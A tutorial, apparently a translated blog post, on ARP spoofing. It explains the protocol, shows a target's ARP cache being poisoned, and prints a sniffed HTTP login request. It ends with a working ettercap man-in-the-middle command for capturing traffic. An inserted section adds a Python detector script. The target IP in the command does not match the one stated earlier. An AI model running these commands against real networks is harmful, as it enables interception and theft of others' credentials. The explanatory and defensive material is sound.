ARP
Address Resolution Protocol: resolves an IP address to the corresponding MAC (physical) address so that communication can take place on the physical network.
How ARP works:
Computer A (192.168.1.2) wants to talk to computer B (192.168.1.3). Network communication requires knowing the peer's MAC address before any data can be transmitted, so A broadcasts on the network: "Who has IP address 192.168.1.3? Tell me your MAC address." The computers that are not B see that the broadcast has nothing to do with them and stay silent; only B answers and tells A its own MAC address.
How ARP spoofing works:
Computer C (192.168.1.7, MAC address xx.xx) broadcasts a lie on the network: "My IP is 192.168.1.1 and my MAC address is xx.xx." Every computer that receives the message remembers this false information (it is stored in the ARP cache table), so from then on all data addressed to 192.168.1.1 is delivered to MAC address xx.xx, i.e. computer C (192.168.1.7).
Attack principle: home computers normally send their traffic to the gateway (router). If the ARP cache on the target machine can be made to hold the attacker's information for the gateway's IP, the attacker can impersonate the gateway; all of the target's traffic is then sent to the attacker, achieving a hijack.
Gateway: 192.168.1.1 (router)
Target: 192.168.1.8 (Windows XP)
Attacker: 192.168.1.7 (Linux)
View the target's ARP cache:
C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.1.8 --- 0x2
Internet Address Physical Address Type
192.168.1.1 ec-xx-xx-xx-xx-3f dynamic
Start the attack:
C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.1.8 --- 0x2
Internet Address Physical Address Type
192.168.1.1 08-xx-xx-xx-xx-5e dynamic
192.168.1.7 08-xx-xx-xx-xx-5e dynamic
Checking the target again (screenshot from the target machine):
C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.1.8 --- 0x2
Internet Address Physical Address Type
192.168.1.1 ec-xx-xx-xx-xx-3f dynamic
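The difference between the three arp -a listings above is exactly what a host-side check can flag: during the attack the gateway entry suddenly carries the attacker's MAC, and that same MAC appears for two different IP addresses. As an added example that is not part of the original post, the following Python script parses Windows arp -a output (the samples are constructed from the listings above, keeping the masked MAC octets) and reports when the gateway's MAC deviates from a recorded baseline or when one MAC is bound to several IPs.

```python
import re
from collections import defaultdict

# Constructed samples modelled on the arp -a listings above (MAC octets masked as on the page).
ARP_BEFORE = """Interface: 192.168.1.8 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           ec-xx-xx-xx-xx-3f     dynamic
"""
ARP_DURING = """Interface: 192.168.1.8 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           08-xx-xx-xx-xx-5e     dynamic
  192.168.1.7           08-xx-xx-xx-xx-5e     dynamic
"""

# One ARP entry: IPv4 address, dash-separated MAC (the 'x' placeholder is accepted), entry type.
ENTRY = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fx]{2}(?:-[0-9a-fx]{2}){5})\s+(\w+)", re.I)


def parse_arp(text):
    """Return {ip: mac} from Windows 'arp -a' output; header and interface lines are skipped."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def find_spoofing(table, gateway_ip, known_gateway_mac):
    """Return a list of findings: gateway MAC changed from baseline, or one MAC claims several IPs."""
    findings = []
    gw_mac = table.get(gateway_ip)
    if gw_mac and gw_mac != known_gateway_mac.lower():
        findings.append(f"gateway {gateway_ip} MAC changed: {known_gateway_mac} -> {gw_mac}")
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} is bound to several IPs: {', '.join(sorted(ips))}")
    return findings


if __name__ == "__main__":
    for label, dump in (("before", ARP_BEFORE), ("during", ARP_DURING)):
        print(label, find_spoofing(parse_arp(dump), "192.168.1.1", "ec-xx-xx-xx-xx-3f"))
```

The baseline gateway MAC has to be recorded while the network is known to be clean; a static ARP entry for the gateway is the usual mitigation once the real MAC is known.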
Sniffing the target's HTTP account name and password:
POST /login.php?nowtime=1545925967777&verify=fba67eef HTTP/1.1.
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*.
Referer: http://www.xxx.com/thread.php?fid=38.
Accept-Language: zh-cn.
Content-Type: application/x-www-form-urlencoded.
UA-CPU: x86.
Accept-Encoding: gzip, deflate.
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2).
Host: www.xxx.com.
Content-Length: 109.
Connection: Keep-Alive.
Cache-Control: no-cache.
Cookie: dd452_lastvisit=1769%091545925789%09%2Flogin.php%3Fnowtime1545925789701%26verifyfba67eef; dd452_lastpos=other; dd452_ol_offset=11543; dd452_ipstate=1545924020; _ac_app_ua=8a8f4074b5cc6c0ef5; dd452_cloudClientUid=5450535; dd452_threadlog=%2C38%2C..
jumpurl=http%3A%2F%2Fwww.xxx.com%2Fthread.php%3Ffid%3D38&step=2&ajax=1&pwuser=aaaaaaa&pwpwd=bbbbbbb&lgt=0
Using the command line:
Attack command:
sudo ettercap -Tqi en0 -M arp:remote /192.168.1.4// /192.168.1.1// -l /tmp/log
This creates the files log.eci and log.ecp under /tmp, which can be read directly with etterlog:
etterlog log.ecp